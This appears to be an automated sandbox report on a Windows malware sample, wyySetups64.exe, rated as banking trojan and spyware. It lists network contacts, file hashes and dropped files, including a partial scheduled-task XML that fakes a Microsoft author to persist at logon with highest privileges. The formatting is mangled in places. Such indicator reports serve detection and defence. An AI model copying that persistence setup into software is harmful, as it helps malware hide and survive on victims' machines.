                                                                                                                                                                http://down.360safe.com/setup.exehttp://d360instpatch.exe, 00000009.00000002.1799520437.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#wyySetups64.exe, wyySetups64.exe.0.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.goodfont.co.kr360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://aka.ms/pscore6lBqqpowershell.exe, 00000006.00000002.1774677766.0000000005531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1765795867.0000000004838000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1765795867.0000000004825000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.typography.netD360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.galapagosdesign.com/staff/dennis.htm360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://g.live.com/odclientsettings/ProdV2edb.log.12.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://pinst.360.cn/360safe/h_inst.cab360instpatch.exe, 00000008.00000002.4115869359.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799585748.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              http://agd.p.360.cn36pData360instpatch.exe, 00000008.00000002.4118556728.00000000046D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              http://sfdw.360safe.com/safesetup_2000.exe360360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                              137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                                                              1.192.136.170
                                                                                                                                                                              st.p.360.cnChina
                                                                                                                                                                              137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                                                              118.107.44.219
                                                                                                                                                                              unknownSingapore
                                                                                                                                                                              64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                                                                                                                              IP
                                                                                                                                                                              127.0.0.1
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1581895
Start date and time:2024-12-29 09:01:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 11m 7s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:wyySetups64.exe
Detection:MAL
Classification:mal100.bank.troj.spyw.evad.winEXE@16/33@8/14
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 82%
• Number of executed functions: 321
• Number of non-executed functions: 185
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 52.149.20.212, 13.107.246.63
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 2008 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3928 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
03:02:05  API Interceptor  6x Sleep call for process: powershell.exe modified
03:02:05  API Interceptor  2859077x Sleep call for process: wyySetups64.exe modified
03:02:11  API Interceptor  3x Sleep call for process: svchost.exe modified
03:02:44  API Interceptor  6034982x Sleep call for process: 360instpatch.exe modified
08:02:08  Task Scheduler   Run new task: .Net OneStart path: C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                        xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 221.183.165.41
                                                                                                                                                                                                        xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 36.167.111.22
                                                                                                                                                                                                        telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 36.184.46.9
                                                                                                                                                                                                        telnet.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 211.137.135.162
                                                                                                                                                                                                        CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 1.192.222.114
                                                                                                                                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                        • 1.192.240.164
                                                                                                                                                                                                        Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 1.192.222.117
                                                                                                                                                                                                        meerkat.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 1.192.193.56
                                                                                                                                                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 36.99.183.94
                                                                                                                                                                                                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                        • 1.192.193.76
                                                                                                                                                                                                        la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 1.192.240.133
                                                                                                                                                                                                        m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                        • 36.99.33.202
                                                                                                                                                                                                        0aEXGHNxhO.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                        • 36.99.206.133
                                                                                                                                                                                                        chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 171.8.167.22
                                                                                                                                                                                                        CMNET-GDGuangdongMobileCommunicationCoLtdCNdb0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                        • 117.150.97.30
                                                                                                                                                                                                        db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                        • 117.151.161.150
                                                                                                                                                                                                        db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                        • 117.135.228.168
                                                                                                                                                                                                        db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                        • 36.169.144.160
                                                                                                                                                                                                        xd.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 112.28.62.4
                                                                                                                                                                                                        xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 117.183.45.215
                                                                                                                                                                                                        xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 221.183.165.41
                                                                                                                                                                                                        xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 36.167.111.22
                                                                                                                                                                                                        telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 36.184.46.9
                                                                                                                                                                                                        telnet.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 211.137.135.162
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\{DFE14265-3905-4689-9143-1E1473933304}.tmp\360P2SP.dll | A1FsbRkm5m.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll | A1FsbRkm5m.exe | malicious | Unknown
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38
                                                                                                                                                                                                            Entropy (8bit):2.715811782923715
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:AlmklUCctl:9k+ftl
                                                                                                                                                                                                            MD5:A5B51AD7AAA9622E1508A73C7F4F9B25
                                                                                                                                                                                                            SHA1:0092290121284CCFDB50DE5DA4785FA21E084E29
                                                                                                                                                                                                            SHA-256:E8790019319BD842CE2A690A833E213C0B5306462B9A33C08794E330EE0FE1FA
                                                                                                                                                                                                            SHA-512:44E2D4BA5BE5B824607960BFA7926E7AA7C7498482775AB09B2F3AAF875F2F51460010A7052E59BD27D144F3F85E7DAA40A0573B953A8C128B4A6AF69B37BC6B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:{.3.5.0.A.F.A.5.A.-.D.E.9.3.-.4.4.a.5.
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8192
                                                                                                                                                                                                            Entropy (8bit):0.363788168458258
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                                                                                                                                            MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                                                                                                                                            SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                                                                                                                                            SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                                                                                                                                            SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                            Entropy (8bit):1.3107262203267638
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrN:KooCEYhgYEL0In
                                                                                                                                                                                                            MD5:CE3EC02AFA060E7FEA188FF570456C44
                                                                                                                                                                                                            SHA1:607FB96901A4E588344B5BFF18A506BEBDFEA944
                                                                                                                                                                                                            SHA-256:9FA93E8110A3AB754CC6C14B8B58D8A0D5F6FDE241451C23D6330759BB28D435
                                                                                                                                                                                                            SHA-512:8796F06B248EF85E8B228EC1E3A2E58FA42D7E96CD28DFD304FA547AF3177BAA8BA370927FEC4EC12E435E140EA00B1ED0A5E1B862BBB45FF29C14BF5F7CC19E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0b4a0768, page size 16384, Windows version 10.0
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                            Entropy (8bit):0.4222349599198364
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:PSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:Pazag03A2UrzJDO
                                                                                                                                                                                                            MD5:655028FDD23ED451E0397773E1BAC1A9
                                                                                                                                                                                                            SHA1:A88696C81528F8D8236E76F1E85CC463079B78AD
                                                                                                                                                                                                            SHA-256:C0D458121BEB24C17B6F49A29EFF3AA48AED0053A7F906321AA9E26CA3EA92B2
                                                                                                                                                                                                            SHA-512:6E6FF28B91577EBE48780E2F92AEEE4A2B390273FEC9D6F311764652E6BE325A0C82A4FC23F84AA6F2BC2F146E4C416AAA2456E17906866EF355FDA99ACCDB2F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                            Entropy (8bit):0.07898751490061796
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:i1OetYeZKwMkZAtn3YzZ09zmthQAtAllOE/tlnl+/rTc:mrzZK7JtnIqmthJtApMP
                                                                                                                                                                                                            MD5:CA434AEA9BBD4A5CE59A4C33180C02C9
                                                                                                                                                                                                            SHA1:21C49D045CD539AC790EEE8753ACD3A2E0AE3C8E
                                                                                                                                                                                                            SHA-256:76CD290CA1FA00F5C2A9965D575C65FF54B8EBFF38387011F24A17A3C1FF943B
                                                                                                                                                                                                            SHA-512:CD719F4A1616A36E4065B8F1CA4C34DCE9731F1BDD21284D72D9FF330EBD5B33EF49967DE7D0E0A776A119CEB37C088B53655EBB9A3A6DA69DD3A1112251D944
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4118496
                                                                                                                                                                                                            Entropy (8bit):7.743814085153487
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
                                                                                                                                                                                                            MD5:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                                                            SHA1:6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
                                                                                                                                                                                                            SHA-256:B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                                                                                                                                                                                            SHA-512:D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:NlllulBkXj:NllUS
                                                                                                                                                                                                            MD5:453075887941F85A80949CDBA8D49A8B
                                                                                                                                                                                                            SHA1:7B31CA484A80AA32BCC06FC3511547BCB1413826
                                                                                                                                                                                                            SHA-256:84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
                                                                                                                                                                                                            SHA-512:02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\wyySetups64.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1893
                                                                                                                                                                                                            Entropy (8bit):5.212287775015203
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                                                                                                                                                            MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                                                                                                                                                            SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                                                                                                                                                            SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                                                                                                                                                            SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 648 bytes, 1 file, at 0x2c +A "setup.ini", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):648
                                                                                                                                                                                                            Entropy (8bit):7.46325903759004
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:wztrG9cLEvuu0zPphueB3phrHtFGW4RJlXi2BzbtQ4F2k5xcGKB5bDHKq:wfLE2FzR8eB3phRkXZzbtL2yxcGabDqq
                                                                                                                                                                                                            MD5:DCF8A1E58C81782DC11CFF675B105B63
                                                                                                                                                                                                            SHA1:08D4821471E445965CAEAD5093AF44460CD74B92
                                                                                                                                                                                                            SHA-256:034283B5FA8C86E481E4B927A234A7A83533B42B851E0924E48BE77032182F27
                                                                                                                                                                                                            SHA-512:E36E9AA8278BF2055A5F16991F05B3329A404EF025A132A6E42AAEAB65E0BD05A43BE0E0829B54F7ECC95F8F2B6F82D32D08BD32F15600AF3B52B6372CC51E04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 648 bytes, 1 file, at 0x2c +A "setup.ini", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):648
                                                                                                                                                                                                            Entropy (8bit):7.46325903759004
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:wztrG9cLEvuu0zPphueB3phrHtFGW4RJlXi2BzbtQ4F2k5xcGKB5bDHKq:wfLE2FzR8eB3phRkXZzbtL2yxcGabDqq
                                                                                                                                                                                                            MD5:DCF8A1E58C81782DC11CFF675B105B63
                                                                                                                                                                                                            SHA1:08D4821471E445965CAEAD5093AF44460CD74B92
                                                                                                                                                                                                            SHA-256:034283B5FA8C86E481E4B927A234A7A83533B42B851E0924E48BE77032182F27
                                                                                                                                                                                                            SHA-512:E36E9AA8278BF2055A5F16991F05B3329A404EF025A132A6E42AAEAB65E0BD05A43BE0E0829B54F7ECC95F8F2B6F82D32D08BD32F15600AF3B52B6372CC51E04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:Generic INItialization configuration [360Safe]
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):854
                                                                                                                                                                                                            Entropy (8bit):5.54815735280418
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:9QQ08ETkByYcqQZLTvOIuAALne2toBFjlVH:9QUETacqQJWIdAzxtonlV
                                                                                                                                                                                                            MD5:CB13859BCE5ADF79C6B2E1C4601FA06A
                                                                                                                                                                                                            SHA1:5562D46E7FBD8A3FF92AFE2270B23F5E73FF45D7
                                                                                                                                                                                                            SHA-256:601CFCA4A7123503331D7641666F7F48164AEB2494B007ECE4C8880F51AF6E2D
                                                                                                                                                                                                            SHA-512:C355FAE3C70B875A08F4BA8BC7D9463D5DB686D2113970F0ED17A5D723DA2ADF82334AFAF3345AABB51A2A89873C15926341AA18D90FF374FA1FB68B82BF3AC4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:[360Installer]..SlideShowResourceURL=http://down.360safe.com/360safe/slideshow_new.cab..From=h_inst..Product=360Safe....[360Safe]..Name=360........Pid=h_inst..FID=setup_13.0.0.2008k..Version=13.0.0.2009..RegVersionFile=360Ver.dll..IsBeta=0..Urls=pdown://b2=100027000|p2=B0A12507C5F7FB22D8E1EB5B2682074BD0218EF0|p3=20|p7=15|c2=1|b5=360......|b6=........|b7=5|b9=1|http://dl.360safe.com/setup_13.0.0.2008k.exe..MD5FileID=E901BD5EEF684DD36520382E5FC26236..SetupParam=/pid=h_inst /noreboot=1 /installer=1 /S..SlideShowImage=360safe_1.png,360safe_2.png,360safe_3.png,....[360signdata]..sign=0100000094BB9E7DD93895D39142938A10B443920CBE15CC1E5C20E47CA37526F047D27B4EE9567798C27E09EB3C005E187E0CE1A9B7EA4C2DA5D92120A8B6ABEBF270462455BBA3FD1AA5ACE5C44196EF1083BB9FAEDAD4C74F82DEFB96A173B5519816D7C03F06C87BAC684A0CF6FB459E487DCDEF38C3AF0864CB102E42D0FF3412A0
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17
                                                                                                                                                                                                            Entropy (8bit):2.409267252251469
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:lsS+n:U
                                                                                                                                                                                                            MD5:983514E15961BFDA71A616E3CA412147
                                                                                                                                                                                                            SHA1:8A938B2349A33CB8A45975F5E1084AC4ED702C72
                                                                                                                                                                                                            SHA-256:D22207FA67A53E84F79BEB0C103430CCAC7A6D6EEC028262135DDE91079F5566
                                                                                                                                                                                                            SHA-512:2C3D100D47A806CCB23F9ABCE816869C80B21EF6B6479C5A7BDEE47F9B14FCD004EE99F30ECC39A60AE35B1ADB0D4DAC52E58DABDB1885940A8888AC1E61B60E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.................
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):304652
                                                                                                                                                                                                            Entropy (8bit):7.999195439763513
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:6144:dl5TTOp1tnABtoSIkutXiC3NxDPYhroRN6AxPM1CKSNEZ4:1TmTAB+XddZAahrKGT
                                                                                                                                                                                                            MD5:8039C279A02FEA0387E8D51BDDE541D5
                                                                                                                                                                                                            SHA1:A6A52EF6C01FDE3A1A1C702C41777119DBDB203A
                                                                                                                                                                                                            SHA-256:0BA9A3E6E4B89ED8C30C092845ECAB5939AFE4C701A130FDC6ECC9D0EC1A8386
                                                                                                                                                                                                            SHA-512:97F45BF13FF85AD252B46C8E62D2D114E84B3AEF17AA2E3B21CE47B41B416D2000506EE9BFABBC055295817CE6D7D9771A038ACFAE514CCA852EF861751C7254
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:PNG image data, 600 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16151
                                                                                                                                                                                                            Entropy (8bit):7.9414528437087935
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:9SmRt7jn8csHkzjhJuCwQ19rtw5srwat0ADwP0F43ec1:dt7bjsHkBwCwseat0AkdOc1
                                                                                                                                                                                                            MD5:3641846128E0A27A28CA0DBA8942B896
                                                                                                                                                                                                            SHA1:88C40C9923AB48E0C01883A773E297541CE49882
                                                                                                                                                                                                            SHA-256:CBF7CD45FE193E0A438CE14B0176077762E984F897091A682F9E866983DA9174
                                                                                                                                                                                                            SHA-512:15910E5A279F17EA06618CB8DCBB64FE8F8E6F5061FC14BCA6A92FF2795CF64EACEB2067104358A014079550CA1B4F24200935E2F10B1EDE6622D94794047550
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1346052
                                                                                                                                                                                                            Entropy (8bit):7.9989996832434676
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:24576:S25OCGNlwNr5PL8MqxJTFl9YioVgxuz4Z0dTeLieM1V9QPjQw:B0N2NFL8VB9iiL0dTeOt23
                                                                                                                                                                                                            MD5:4F688C8A30E46A14A868F07E283763F2
                                                                                                                                                                                                            SHA1:BA736A93EF1F07B1C7C24F4201B632F1CB18E73A
                                                                                                                                                                                                            SHA-256:AA02BD7AB8BBF1C1AB138C20D0D7EBB6B5F2E2166E2184405E54D619526E9AC8
                                                                                                                                                                                                            SHA-512:8A1F679BFA7A1D5667FAC931EF9184CBE76E30C26ED1A63E97CE4AFD8815DC1409EDB560EE91FD3DB57AA0BE10D6C567F43FE887440A09897DE09CD8DC7BA88A
                                                                                                                                                                                                            Malicious:false
